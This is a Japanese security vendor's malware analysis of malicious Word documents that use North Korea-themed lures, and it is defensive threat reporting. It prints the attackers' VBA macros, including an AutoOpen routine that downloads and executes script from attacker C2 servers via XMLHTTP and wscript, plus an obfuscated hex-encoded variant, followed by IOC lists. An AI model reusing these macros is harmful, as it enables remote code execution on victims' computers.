対北朝鮮に関する内容を含む不正な Word の持続的な拡散を確認

ASEC 分析チームは、対北朝鮮に関する内容を含む不正な Word ドキュメントが継続的に拡散していることを確認した。確認された Word ファイルに含まれたマクロコードは、過去に掲載した < 「輸出用インゴット売買契約書」に偽装した不正な Word ドキュメント>で確認されたものと類似している。

最近確認されたファイル名は以下の通りである。

  • 中国の軍事戦略分析及び未来の軍事戦略展望.doc (10/25 確認)
  • 質問書-12月放送.doc (10/28 確認)
  • 質問書-7月放送.docm (10/1 確認)
  • KF大洋州次世代政策専門家ネットワーク_発題案内(2).doc (10/7 確認)
  • 210813_業務連絡(サイバーセキュリティ).doc (8月確認)

確認されたファイルのうち多数の Word ドキュメントにおいてファイル名または本文に対北朝鮮関連の内容を含んでいることが特徴である。

[中国の軍事戦略分析及び未来の軍事戦略展望.doc]

「中国の軍事戦略分析及び未来の軍事戦略展望.doc」に含まれているマクロには、以下のようにドキュメント保護の解除に関するコードが存在する。設定されたパスワードは 1qaz2wsx で<対北朝鮮に関する本文内容の External リンクを利用した不正な Word ドキュメント>で説明したドキュメントと同じパスワードを使用しており、このファイルも同じ攻撃者が製作したものと推定される。

Sub Present()
    On Error Resume Next
    Weed "pic", "1qaz2wsx"
    For Mode = 10 To 0 Step -1
        ActiveWindow.View.SeekView = Mode
        With Selection
            .WholeStory
            .Font.Hidden = False
            .Collapse
        End With
    Next
End Sub

ユーザーが Word ファイルを開いてマクロを有効化すると AutoOpen() によって不正なマクロが自動で実行される。不正なマクロは上記のドキュメント保護解除コードを実行した後 hxxp://sarvice.medianewsonline[.]com/file/uplload/list.php?query=1 から追加データを受け取り、1589989024.xml に保存する。不正な振る舞いを実行するマクロコードは以下の通りである。

Sub AutoOpen()
    On Error Resume Next
    Present
    wnd.Save
    cnt = "On Error Resume Next:Set mx = CreateObject(""Microsoft.XMLHTTP""):mx.open ""GET"", ""http://sarvice.medianewsonline.com/file/uplload/list.php?query=1"", False:mx.Send:Execute(mx.responseText)"
    pth = GenPlace() & "\1589989024.xml"
    ResContent pth, cnt
    Perform ("wscript.exe //e:vbscript //b " & pth)
End Sub

[質問書-12月放送.doc]

「質問書-12月放送.doc」の場合、上で説明した Word ファイルのマクロコードよりも更に難読化されている。

Sub ytoqdggdrsetyaeorw(bret)
fn = FreeFile
ui = isqgsilwwutr("677265656e6761726465") & isqgsilwwutr("6e2e6b6b6b32342e6b722f6d6f62696c652f736b696e2f626f6172642f67616c6c6572792f6572726f722f757064617465")
rp = Environ(isqgsilwwutr("617070") & isqgsilwwutr("64617461")) & isqgsilwwutr("5c4d6963726f736f66745c4f66666963655c76657273696f6e2e") & isqgsilwwutr("786d6c")
Open rp For Output As #fn
hs = isqgsilwwutr("4f6e") & isqgsilwwutr("204572726f7220526573756d65204e6578743a536574206f7073743d4372656174654f626a65637428")
mids = isqgsilwwutr("4d53584d4c322e536572766572584d4c") & isqgsilwwutr("485454502e362e30")
hs = hs & """" & mids & """"
mids = isqgsilwwutr("293a6f7073742e6f70") & isqgsilwwutr("656e20")
hs = hs & mids & """"
mids = isqgsilwwutr("474554")
hs = hs & mids & """," & """"
mids = isqgsilwwutr("687474703a2f2f78") & isqgsilwwutr("78782f6c6973742e7068703f71756572793d31")
mids = Replace(mids, isqgsilwwutr("787878"), ui)
<省略>

このマクロもやはり「中国の軍事戦略分析及び未来の軍事戦略展望.doc」と同じ不正な振る舞いを実行し、アクセスする URL は以下の通りである。

  • hxxp://greengarden.kkk24.kr/mobile/skin/board/gallery/error/update/list.php?query=1

また、「質問書-12月放送.doc」の Word ファイルは収集されなかったが、これと類似するファイル名を持つ「質問書-7月放送.docm」ファイルは以下の通り対北朝鮮に関する内容が存在する。

[質問書-7月放送.docm]

図1.質問書-7月放送.docm の本文

接続 URL : hxxp://sendlucky.scienceontheweb.net/ben/chads/list.php?query=1

以下は類似マクロファイルから確認された追加の C2 アドレスである。

  • hxxp://smgfishing.co[.]kr/theme/basic/mobile/skin/new/basic/list.php?query=1
  • hxxp://tinytalk.mygamesonline[.]org/web/fell/list.php?query=1
  • hxxp://sendlucky.scienceontheweb[.]net/ben/chads/list.php?query=1
  • hxxp://bipaf[.]org/bbs/zipcode/style/css/list.php?query=1

このように、不正なマクロを含む対北朝鮮関連の Word ドキュメントは様々なファイル名と内容によって拡散が続いている。これらのタイプのファイルの場合、マクロ使用時に実際の関連内容を含んでおり、ユーザーが不正なファイルであることを認知するのが困難なため、特別な注意が必要である。

現在 V3 では、このマルウェアを以下のように検知している。

[ファイル検知]

Downloader/DOC.Generic.S1649

[IOC]

  • c359152a98e5fa5ac422d317a789a955
  • hxxp://sarvice.medianewsonline[.]com/file/uplload/list.php?query=1
  • hxxp://greengarden.kkk24.kr/mobile/skin/board/gallery/error/update/list.php?query=1
  • hxxp://smgfishing.co[.]kr/theme/basic/mobile/skin/new/basic/list.php?query=1
  • hxxp://tinytalk.mygamesonline[.]org/web/fell/list.php?query=1
  • hxxp://sendlucky.scienceontheweb[.]net/ben/chads/list.php?query=1
  • hxxp://bipaf[.]org/bbs/zipcode/style/css/list.php?query=1

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

5 1 vote
評価する
guest
0 コメント
Inline Feedbacks
View all comments